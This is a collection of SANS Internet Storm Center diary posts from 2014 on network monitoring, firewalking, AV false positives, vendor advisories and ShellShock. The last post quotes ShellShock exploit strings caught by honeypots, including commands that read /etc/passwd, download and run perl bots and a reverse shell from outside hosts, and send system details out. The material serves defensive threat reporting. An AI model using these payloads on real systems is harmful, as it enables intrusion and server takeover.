Alerts

ISC StormCast for Monday, October 6th 2014 http://isc.sans.edu/podcastdetail.html?id=4179, (Mon, Oct 6th)

Latest Alerts - Sun, 10/05/2014 - 17:49
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Detecting irregular programs and services installed in your network, (Sun, Oct 5th)

Latest Alerts - Sun, 10/05/2014 - 09:34

When the corporate network becomes target, auditing for security policy compliance can be challenging if you don't have a software controlling irregular usage of administrator privilege granted and being used to install unauthorized software or to change configuration by installing services that could cause an interruption in network service. Examples of this possible issues are additional DHCP Servers (IPv4 and IPv6), Dropbox, Spotify or ARP scanning devices.

We can use nmap to detect all protocols that sends broadcast packets and are supported by packetdecoders.lua:

  • Ether
    • ARP requests (IPv4)
    • CDP - Cisco Discovery Protocol
    • EIGRP - Cisco Enhanced Interior Gateway Routing Protocol
    • OSPF - Open Shortest Path First
  • UDP
    • DHCP
    • Netbios
    • SSDP
    • HSRP
    • DropBox
    • Logitech SqueezeBox Discovery
    • Multicast DNS/Bonjour/ZeroConf
    • Spotify

The following example shows how to use nmap with the broadcast listener script and we can see the result of a device with dropbox installed, a device sending ARP request (a router in this case) and a device sending DHCPv6 requests:

You can run this program periodically to track common security issues in your network, just in case your IPS could be missing something ;)

Manuel Humberto Santander Pelaez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Testing for opened ports with firewalk technique, (Sat, Oct 4th)

Latest Alerts - Sun, 10/05/2014 - 09:33

There is an interesting way of knowing what kind of filters are placed in the gateway of a specific host. It is called firewalk and it is based on IP TTL expiration. The algorithm goes as follows:

  • The entire route is determined using any of the traceroute techniques available
  • A packet is sent with the TTL equal to the distance to the target
  • If the packet times out, it is resent with the TTL equal to the distance to the target minus one.
  • If an ICMP type 11 code 0 (Time-to-Live exceeded) is received, the packet was forwarded and so the port is not blocked.
  • If no response is received, the port is blocked on the gateway.

Let?s see this with a real example. Consider the following network diagram:

Firewalking happens with the following steps:

  1. Traceroute packets are sent to determine the gateway with decremental TTL:

....

2. An ICMP Time Exceeded message is received from the default gateway for the TTL=2 and TTL=1 packet, which means there are two gateways between origin and destination and TTL=3 is the distance to the destination

3. Several packets are sent with TTL=3 to the destination varying the destination port. The sequence goes as follows: A first packet is sent with TTL=3. If a timeout occurs, a second packet is sent with TTL=1. If an ICMP type 11 code 0 (Time-to-live exceeded) is received, the gateway is forwarding the packet.

Let?s see the first packet to port 1 and TTL=3:

Timeout occurs, so same packet is sent with TTL=2:

ICMP type 11 code 0 is sent from the gateway routing the destination host, which means the packet was forwarded and the port is opened:

How can we use this technique? Nmap has a firewalk script that can be used. For this example, the following command should be issued:

nmap --script=firewalk --traceroute 172.16.2.165

Manuel Humberto Santander Pelaez
SANS Internet Storm Center - Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

CSAM: The Power of Virustotal to Turn Harmless Binaries Malicious, (Fri, Oct 3rd)

Latest Alerts - Fri, 10/03/2014 - 10:47

We all know that anti virus, the necessary evil of basic computer security, isn't a stranger to false positives. So no big surprise here when John is writing that he ran into such a false positive during an incident response:

I was scanning a forensic drive image with clamav and scored a positive hit on a file.

Great. ClamAV, a free anti-virus product. Of course, we don't trust it. So John did what most of use would have done, and submitted the suspect binary to Virustotal:

Virustotal showed 14 out of other 50 AV vendors' products thought it was malware as well.

Ouch! 14 out of 50? Many actual malware samples I submit get a lower rate then that. Turns out the binary in question was a desktop management software, "lunchwrapper.exe", and the AV tools picked up on it's file download component (the famous "generic downloader" signatures).

But you think this is bad? Listen what happened next according to John:

The scary part was that after I submitted the sample, other major AV vendors decided that the submitted sample was malicious and our endpoint software starting quarantining the program after the AV dats had updated.

After all, as my fellow developer can attest?too: The reason we allow people to use our applications is so that we don't have to do any testing ourselves.

(BTW: Virustotal/Google are doing great work, and I think it is a good thing that they are distributing samples. The problem is how AV vendors use this information.)

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Friday, October 3rd 2014 http://isc.sans.edu/podcastdetail.html?id=4177, (Fri, Oct 3rd)

Latest Alerts - Thu, 10/02/2014 - 16:13
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Why is your Mac all for sudden using Bing as a search engine?, (Thu, Oct 2nd)

Latest Alerts - Thu, 10/02/2014 - 13:14

Even as a Mac user, you may have heard about Bing, at least you may have seen it demonstrated in commercials [1]. But if your default search engine on your Mac is all for sudden switched to Bing, this may be due to another piece of legacy software that some Mac users may have a hard time living without : Microsoft's Internet Explorer. So why not just search ("google") if there is a version for OSX:

In short: I don't think this software does anything illegal. It clearly advertises what it does. If you feel otherwise, you can file a complaint with courts in Cyprus where the company is located.

[1] https://www.youtube.com/user/bing
​[2] http://info.trovi.com/Privacy

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

CSAM: My Storage Array SSHs Outbound!, (Thu, Oct 2nd)

Latest Alerts - Thu, 10/02/2014 - 06:29

Kuddos to Matthew for paying attention to egress traffic. We keep emphasizing how important it is to make sure no systems talk "outbound" without permission. Just this last week, various Shellshock exploits did just that: Turn devices into IRC clients or downloading additional tools via HTTP, or just reporting success via a simple ping.

So no surprise that Matthew wrote us: "... the first time I saw the storage array SSH to the internet I about fainted. ..."

I would be surprised too! And turns out that isn't the only person that experienced this. Mark noted:

"Had the seem freak moment when I saw it happen.  The SAN happily communicating to an outside entity.  Though the company had been well and truly hosed."

Luckily, before going too far down the incident handling road, Matthew realized that this was a false positive. The storage array in question called "back home" to the vendor to report on its status. The purpose of this communication is to report failed disks or other critical events that may trigger a service call. Vendors will agree to turn off this feature, but then of course it is up to you to recognize faulty disks.

Got anything like that? Let us know. (if possible with log snippet / packet capture or other show-and-tells)

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Cyber Security Awareness Month 2014: Scary False Positives, (Thu, Oct 2nd)

Latest Alerts - Thu, 10/02/2014 - 05:57

To "celebrate" cyber security awareness month, we decided to focus on "scary false positives" during October. If you have any to share, please let us know. What we are looking for is preferably a lot entry, or another "indicator" that led you to believe that your system was compromised, but in the end turned out to be a false positive.

Please e-mail your stories to handlers-at-isc.sans.edu or use out Contact form.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, October 2nd 2014 http://isc.sans.edu/podcastdetail.html?id=4173, (Thu, Oct 2nd)

Latest Alerts - Wed, 10/01/2014 - 16:41
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Xen Security Advisory - XSA 108 - http://xenbits.xen.org/xsa/advisory-108.html, (Wed, Oct 1st)

Latest Alerts - Wed, 10/01/2014 - 15:04

Xen has issued an advisory and a related patch to address an issue that allows a "buggy or malicious HVM guest to crash the host or read data relating to other guests or the hypervisor itself."

Xen 4.1 and onward are vulnerable, only x86 systems are vulnerable. ARM systems are not vulnerable.

Applying the patch resolves this issue.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Security Onion news: Updated ShellShock detection scripts for Bro, (Wed, Oct 1st)

Latest Alerts - Wed, 10/01/2014 - 13:03

Per Security Onion's Doug Burks, Seth Hall has developed some comprehensive ShellShock detection scripts for Bro.
These scripts "detect successful exploitation of the Bash vulnerability with CVE-2014-6271 nicknamed "ShellShock" and are more comprehensive than most detections in that they're watching for behavior from the attacked host that might indicate successful compromise or actual vulnerability."
Seth has updated these scripts again today to "Add shellscripts as a post-exploit detection mechanism."
Doug has updated the securityonion-bro-scripts package to include these changes and has also updated the securityonion-web-page package to include some ELSA queries for "ShellShock Exploits" and "ShellShock Scanners".

This is great for current Security Onion users, and even better for readers who have not yet investigated and invested in Security Onion. Now's the time to become familiar and improve your situational awareness, particularly given the fact that it's National Cyber Security Awareness Month. :-)

Everything you need is available on Doug's blog: http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

VMware security advisory: VMSA-2014-0010 http://www.vmware.com/security/advisories/VMSA-2014-0010.html, (Wed, Oct 1st)

Latest Alerts - Tue, 09/30/2014 - 20:10
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, October 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4171, (Wed, Oct 1st)

Latest Alerts - Tue, 09/30/2014 - 16:27
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

DerbyCon highlights, (Tue, Sep 30th)

Latest Alerts - Tue, 09/30/2014 - 15:59

I had the pleasure of attending DerbyCon 4.0 (Family Rootz) this past Friday and Saturday and can tell you that if you haven't already attended yourself, plan to do so next year. Aside from the smaller and more encompassing "family" feel, an intentional and protected approach strongly advocated for by @HackingDave and the great @DerbyCon team, you'll also be contributing to Hackers For Charity (HFC). For those of you who couldn't attend but are interested in some of the outstanding content, Adrian Crenshaw (@irongeek_adc) and his team always shoot video of each presentation. For DerbyCon 4.0 they've posted the videos to the Irongeek site here.  

There are so many great talks to choose from but I'll share a few that really resonated with me given current interest or focus areas:

Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades - Tim Medin
Abusing Active Directory in Post-Exploitation – Carlos Perez
Ball and Chain (A New Paradigm in Stored Password Security) – Benjamin Donnelly and Tim Tomes
Third Party Code: FIX ALL THE THINGS – Kymberlee Price and Jake Kouns

You should also, in the simple name of humanity, watch Johnny Long's keynote, Hackers saving the world from the zombie apocalypse.

Great conference, great people, great presentations; take the time to watch as many of the videos as possible, and see if you can get a ticket next year when DerbyCon comes around again.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

DerbyCon highlights, (Tue, Sep 30th)

Latest Alerts - Tue, 09/30/2014 - 14:41

I had the pleasure of attending DerbyCon 4.0 (Family Rootz) this past Friday and Saturday and can tell you that if you haven't already attended yourself, plan to do so next year. Aside from the smaller and more encompassing "family" feel, an intentional and protected approach strongly advocated for by @HackingDave and the great @DerbyCon team, you'll also be contributing to Hackers For Charity (HFC). For those of you who couldn't attend but are interested in some of the outstanding content, Adrian Crenshaw (@irongeek_adc) and his team always shoot video of each presentation. For DerbyCon 4.0 they've posted the videos to the Irongeek site here.  

There are so many great talks to choose from but I'll share a few that really resonated with me given current interest or focus areas:

Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades - Tim Medin
Abusing Active Directory in Post-Exploitation – Carlos Perez
Ball and Chain (A New Paradigm in Stored Password Security) – Benjamin Donnelly and Tim Tomes
Third Party Code: FIX ALL THE THINGS – Kymberlee Price and Jake Kouns

You should also, in the simple name of humanity, watch Johnny Long's keynote, Hackers saving the world from the zombie apocalypse.

Great conference, great people, great presentations; take the time to watch as many of the videos as possible, and see if you can get a ticket next year when DerbyCon comes around again.

Russ McRee | @holisticinfosec

 

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC threat level returned to green - ShellShock message traffic subsiding, recommend focus on patching and monitoring, (Tue, Sep 30th)

Latest Alerts - Tue, 09/30/2014 - 13:43
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169, (Tue, Sep 30th)

Latest Alerts - Mon, 09/29/2014 - 16:27
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769, (Mon, Sep 29th)

Latest Alerts - Mon, 09/29/2014 - 13:54

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th)

Latest Alerts - Mon, 09/29/2014 - 11:41

I just published an updated YouTube presentation (about 15 min in length) with some of the shell shock related news from the last couple days:

YouTube: https://www.youtube.com/watch?v=b2HKgkH4LrQ
​PDF: https://isc.sans.edu/presentations/ShellShockV2.pdf
PPT: https://isc.sans.edu/presentations/ShellShockV2.pptx

Audio: 

 

As always, the material is published "create commons / share alike", so feel free to use the slides.

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

Latest Alerts - Mon, 09/29/2014 - 07:05

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 - Simple "vulnerability checks" that used custom User-Agents:

() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Co\
ntent-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn't escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an "empty page" message.

) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

 

2 - Bots using the shellshock vulnerability:

This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0\
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http\
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh\
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.\
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:\
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

3 - Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 - Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 - Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*\
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"
Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)" 

6 - User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

 

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts
Syndicate content